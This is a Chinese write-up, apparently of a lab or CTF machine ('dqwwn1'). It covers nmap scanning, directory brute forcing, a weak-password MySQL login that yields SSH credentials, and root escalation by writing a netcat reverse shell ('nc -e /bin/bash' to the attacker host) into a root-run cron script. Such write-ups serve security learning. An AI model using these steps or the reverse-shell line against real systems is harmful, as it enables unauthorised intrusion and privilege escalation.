首页 > 其他分享 >dqwwn1-服务器弱点

dqwwn1-服务器弱点

时间:2023-05-03 16:35:02浏览次数:37  
标签:弱点 sudo 28.34 192.168 nmap ssh dqwwn1 mysql 服务器

主机发现

sudo nmap -sn 192.168.28.0/24

TCP端口扫描:sudo nmap -sT --min-rate 1000 -p- 192.168.28.34 -oA nmapscan/ports

TCP端口版本扫描sudo nmap -sT -sV -sC -O -p22,80,3306 192.168.28.34 -oA nmapscan/detail

脆弱性扫描:sudo nmap --script=vuln -p22,80,3306 192.168.28.34 -oA nmapscan/vuln 

 对80开放了一个info.php页面访问是一个phpinfo的页面

对有waf,或者是有php配置文件的设置,不能直接形成攻击面,

对http服务进行访问

目录爆破

sudo dirb -u http://xxxxx   -w 字典   #并未发现有特殊的页面,通过深度挖掘发现

sudo dirb -u http://xx -X txt,php,zip,git,rar,sql,tar - w xx 

仍然什么都没有

所以只能进行暴力破解

对于mysql和ssh爆破来说,尝试mysql的暴力破解可能会更好一些,因为更有可能是弱口令和root的登录名

对mysql进行弱口令,空密码登录

sudo mysql -h 192.168.28.34 -uroot -p 

密码root/空密码

发现ssh数据表展开并查看

 获得ssh账户密码后登录

sudo ssh [email protected]

输入密码

成功getshell

权限查询

whoami  uname -a   ip a  sudo -l   

在家目录查询是否有flag

ls -liah

发现有一个sh脚本, 查看任务计划是什么权限运行cat /etc/crontab

发现是由root用户进行,我们将sh脚本写入一些反弹shell即刻提权

完善一下shell的交互性

输入clear报错

 export term=xterm-color

利用各种命令(nc ,ruby,python,java,go,)进行反弹shell

写入

#!/bin/bash

nc -e /bin/bash 192.168.28.29 1234 &

kali监听

nc -lvnp 1234 

成功geshell

在家目录中找flag

标签:弱点,sudo,28.34,192.168,nmap,ssh,dqwwn1,mysql,服务器
From: https://www.cnblogs.com/lisenMiller/p/17369211.html

相关文章

  • Java 网络编程 —— 创建多线程服务器
    一个典型的单线程服务器示例如下:while(true){Socketsocket=null;try{//接收客户连接socket=serverSocket.accept();//从socket中获得输入流与输出流,与客户通信...}catch(IOExceptione){e.printStackTr......
  • dell物理服务器设置断电后自动开机
    F2->SYSTEMBIOSSETTINGS->SYSTEMSECURITY->ACPOWERRECOVERY设置为ON有力量拥抱自己,才有能力温暖别人......
  • 基于centos release 7.9.2009的LINUX进行Git服务器搭建
    1.安装Git首先需要在CentOSLinux7.9.2009上安装Git。可以使用以下命令在命令行中安装:sudoyuminstallgit2.创建Git仓库在CentOS上创建Git仓库有两种方式:创建本地Git仓库或创建远程Git仓库。如果想要将CentOSLinux7.9.2009作为Git服务器,需要创建远程G......
  • 服务器如何测试网速?服务器测试带宽常用方法分享
    相信大家都知道服务器的性能决定了服务器的稳定和速度,比如运算速度,传输速度这个直接影响着每毫秒可以处理多少数据,这个就类似U盘读写速度目前都是光纤,光纤的质量差别并不会很大,如果访问速度不好的话,会让网站加载非常慢,在选择服务商时,首先一定要选择有保障的,方便日常维护其次就是就......
  • MySql在服务器上使用问题的总结
    服务器是WindowsServer2012,我自己安装了一个MySql数据库,然后一个Web程序和客户端程序都想访问数据库,但是遇到一堆问题。主要是我仍然坚持使用.net2.0,挂接MySql.Data6.7.4版本。解决后记录一下1.IIS访问数据库的问题未能加载文件或程序集“MySql.Data”或它的某一个依赖项。找......
  • SSH远程登陆Unbuntu(SSH服务器和客户端配置)
    SSH服务器配置参考:https://blog.csdn.net/weixin_43833430/article/details/127262464 《Ubuntu安装SSH服务》目的:在Unbuntu 中,安装openssh 服务器,开启服务器;安装防火墙,配置防火墙参数(可以通过SSH),然后开启防火墙。重要命令:1systemctlenablessh#开机启动2systemc......
  • 【Linux】云服务器搭建Linux环境
    目录......
  • DataWindowHTTP(三)服务器安装-WEBSERVER
    本组件需要的一个webserver+PHP环境,版本要求为apache2.4+PHP8.0。可以通过两种方式安装:自动安装包(一键安装包)一键安装包有:XAMPP,PhpStudy,Appserv,wampserver,wnmp,DedeAMPZ,LNMP(linux)。到目前较多为apache2.4+php7.x,很快应该会支持到最新的php8.x。二.手工安装配置手工配置,不依赖其他工......
  • python实现跨服务器上传文件
    项目背景由于需要将算法处理过的视频放进存储服务器上,所以涉及到了跨服务器上传视频、图片等代码实现@api_view(['POST'])defupload(request):#定义一个固定的返回值response={'state':1,'des':'normal'}#获取参数ifrequest.method=='POST':......
  • Linux系统之部署Chrony时间服务器
    (Linux系统之部署Chrony时间服务器)一、Chrony介绍1.Chrony简介Chrony是一个开源自由的网络时间协议NTP的客户端和服务器软软件。它能让计算机保持系统时钟与时钟服务器(NTP)同步,因此让你的计算机保持精确的时间,Chrony也可以作为服务端软件为其他计算机提供时间同步服务。2.......